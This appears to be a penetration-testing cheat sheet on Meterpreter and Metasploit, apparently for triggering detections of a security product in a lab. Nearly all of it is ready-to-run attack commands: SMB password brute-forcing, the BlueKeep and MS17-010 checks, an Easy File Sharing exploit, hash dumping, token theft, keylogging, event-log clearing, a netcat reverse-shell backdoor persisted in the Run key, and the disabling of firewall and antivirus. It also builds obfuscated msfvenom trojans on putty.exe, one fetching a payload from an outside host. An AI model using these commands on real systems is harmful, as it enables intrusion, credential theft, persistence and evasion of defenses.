search

Meterpreter

hashtag
Add modules from exploit-db

  1. searchsploit

  2. copy path to /root/.msf4/modules

cp /usr/share/exploitdb/exploits/cgi/webapps/42344.rb /root/.msf4/modules/exploits/cgi/webapps/

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdFind" /t REG_SZ /F /D "C:\Users\Public\aaaa.exe"

runas /user:Administrator "C:\Users\Public\aaaa.exe -f (objectcategory=person)" > C:\Users\Public\ad_users.txt
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/Wordlists/Probable-Wordlists/Real-Passwords/Top1575-probable-v2.txt; set rhost 192.168.2.11; set smbdomain vmoshpit; run; exit -y"
msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.11; run; exit -y"
msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.11; run; exit -y"
msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 172.16.245.12; set lhost 172.16.245.19; set lport 80; run"
msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.212; run; exit -y" && msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.212; run; exit -y"

msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 192.168.2.212; run"

run post/windows/escalate/getsystem
run post/windows/gather/hashdump
run post/windows/gather/lsa_secrets

use incognito list_tokens -u impersonate_token VMOSHPIT\Administrator getuid shell

(0) Cloud Lab NAT 10.34.34.54

(1) Install Easy File Sharing Webserver 7.2 (https://vmoshpit.com/Malware/efssetup.exe.zip) on Windows and run as Administrator (or not)

(2) Run Exploit msf > use exploit/windows/http/easyfilesharing_post msf > set rhosts 192.168.2.215 msf > run

(3) Meterpreter meterpreter > background msf > sessions -l msf > sessions -i 1

System | meterpreter > shell meterpreter > steal_token meterpreter > upload /Pentest/Malware/Antivirus.exe meterpreter > execute -f Antivirus.exe meterpreter > clearev (Clear Event Logs)

hashtag
Filesystem | meterpreter > lpwd (Print local wd) meterpreter > lls (List local files) meterpreter > edit (Edit a file) meterpreter > download (Download a file) meterpreter > search -f *.docx

Credentials | meterpreter > run post/windows/escalate/getsystem meterpreter > run post/windows/gather/hashdump meterpreter > run post/windows/gather/lsa_secrets

| meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token VMOSHPIT\Administrator meterpreter > getuid meterpreter > shell

Network | meterpreter > arp (Display ARP cache) meterpreter > ifconfig meterpreter > route meterpreter > run post/windows/recon/computer_browser_discovery

Gather Info | meterpreter > run post/windows/gather/checkvm meterpreter > sysinfo meterpreter > run post/windows/gather/enum_applications meterpreter > run post/windows/gather/enum_ad_computers meterpreter > run post/windows/gather/enum_av_excluded meterpreter > run winenum (Scrape everything - getsystem first) meterpreter > run post/multi/recon/local_exploit_suggester

Install Netcat Backdoor on Port 445 | meterpreter > upload /usr/share/windows-binaries/nc.exe C:\windows\system32 meterpreter > reg enumkey -k HKLM\software\microsoft\windows\currentversion\run meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe' meterpreter > execute -f cmd -i

netsh firewall show opmode netsh firewall add portopening TCP 666 "Service Firewall" ENABLE ALL netsh firewall show portopening nc -l 666 # nc -lv 192.168.2.11 666

Keylogger | meterpreter > keyscan_start meterpreter > keyscan_stop meterpreter > keyscan_dump meterpreter > screenshot

Control | meterpreter > uictl disable keyboard/mouse/all meterpreter > uictl enable keyboard/mouse/all meterpreter > run post/windows/manage/enable_rdp

(4) Windows CMD Create user 'Backup' and add to Admin Group |

net user Backup Password00-- /add /MaxPWAge:unlimited net localgroup Administratoren Backup /add net localgroup Remotedesktopbenutzer Backup /add

Start/Stop Services

net stop "Windows-Firewall" net stop “Trend Micro Deep Security Agent”

Run as different user |

runas /user:vmoshpit\Administrator command

Print current ARP table |

arp -a

Edit ARP table and add entry |

arp -s 157.55.85.212 00-aa-00-62-c6-09

Create NFS share of Drive C and allow anonymous root access |

nfsshare FFA=C:\ -o anon=yes -o rw -o root Create CIFS share and allow ananymous read/write access (+ delete) | net share FFA=C:\ /grant:Jeder,FULL net share FFA /delete /y Install Telnet Client | dism /online /Enable-Feature /FeatureName:TelnetClient

(5) Linux Shell Add user to sudoer # usermod -aG sudo Veeam

(6) MSFvenom

Payloads:

windows/x64/exec Execute an arbitrary command (Windows x64)

msfvenom --payload windows/x64/exec ""

(a) Create PE that downloads shellcode and executes it as new process. Obfuscate it: msfvenom --payload windows/download_exec URL=http://lxwo.org/venom.exe PrependMigrate=true PrependMigrateProc="Virus.exe" --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/LoJaxStager.exe

(b) Use putty.exe as template to create new PE that opens Windows warning with text. Obfuscate it: msfvenom --payload windows/messagebox ICON=WARNING TEXT="Your files have been encrypted." TITLE="Hacked!" PrependMigrate=true --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Vattenfall02.exe

(c) Use putty.exe as template to create new PE that creates new local Windows user account. Obfuscate it: msfvenom --payload windows/adduser Hacker Hacker1234! --arch x86 --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Skype.exe

(d) Use vncviewer as template to create new PE that connects Meterpreter via TCP to Attacker

(7) Metasploit Modules to trigger Deep Security

use auxiliary/scanner/smb/smb_login set user_as_pass true set user_file /void/wordlist.txt set rhost 192.168.2.215 set smbdomain vmoshpit

(8) Metasploit via CLI/Script

  • SMB Dictionary Attack

  • SMB Dictionary Attack (with useless ‘echo’) #!/bin/bash echo "[+] Downloading Wordlist." echo "[*] Scanning Ports." nmap -T5 -Pn -p445 --open 192.168.2.215 echo "[!] Found vulnerable SMB share." echo "[+] Loading Dictionary Attack." wget -q http://vmoshpit.com/Malware/Wordlists/fasttrack.txt /void/

rm /void/fasttrack.txt echo "[+] Successfully compromised Host.” +

  • Apex VP Trigger: 1009549 - Detected Terminal Services (RDP) Server Traffic - 1 (ATT&CK T1015,T1043,T1076) msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.130; run; exit -y"

  • Apex VP Trigger: 1008227 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2017-0147) 1005448 - SMB Null Session Detected - 1 msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.130; run; exit -y" ~

  • Exploit Easy File Sharing App msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 192.168.2.215; run"

  • Windows PEs on Kali: /usr/share/windows-binaries/

  • Payloads to trigger ATSE- secao.org ikmtrust.com sysanalyticweb.com lxwo.org jflynci.com remotepx.net rdsnets.com rpcnetconnect.com webstp.com elaxo.org 185.77.129.106 185.144.82.239 93.113.131.103 185.86.149.54 185.86.151.104 103.41.177.43 185.86.148.184 185.94.191.65 86.106.131.54

  • Known bad file Hashes 1771e435ba25f9cdfa77168899490d87681f2029

hashtag
|

PreviousIvyNextLateral Movement

Last updated